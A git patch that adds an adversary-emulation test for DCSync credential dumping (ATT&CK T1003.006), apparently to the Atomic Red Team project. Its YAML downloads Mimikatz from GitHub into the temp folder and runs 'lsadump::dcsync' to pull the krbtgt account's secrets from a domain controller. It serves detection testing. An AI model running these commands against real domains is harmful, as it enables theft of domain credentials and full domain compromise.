From d5b6e69f895664e210f84f2dbf8f4e1e794a314e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= <clement.notin@alsid.com>
Date: Wed, 6 Jan 2021 19:46:59 +0100
Subject: [PATCH] T1003.006: add DCSync test (#1352)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
---
 atomics/T1003.006/T1003.006.yaml | 43 ++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 atomics/T1003.006/T1003.006.yaml

diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
new file mode 100644
index 00000000..f7e13487
--- /dev/null
+++ b/atomics/T1003.006/T1003.006.yaml
@@ -0,0 +1,43 @@
+attack_technique: T1003.006
+display_name: "OS Credential Dumping: DCSync"
+atomic_tests:
+- name: DCSync
+  auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
+  description: |
+    Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
+    Works against a remote Windows Domain Controller using the replication protocol.
+    Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
+    [Reference](https://adsecurity.org/?p=1729)
+  supported_platforms:
+    - windows
+  input_arguments:
+    domain:
+      description: Targeted domain
+      type: string
+      default: example.com
+    user:
+      description: Targeted user
+      type: string
+      default: krbtgt
+    mimikatz_path:
+      description: Mimikatz windows executable
+      type: path
+      default: '%tmp%\mimikatz\x64\mimikatz.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
+    prereq_command: |
+      $mimikatz_path = cmd /c echo #{mimikatz_path}
+      if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+    get_prereq_command: |
+      $mimikatz_path = cmd /c echo #{mimikatz_path}
+      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+      New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+      Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      #{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
\ No newline at end of file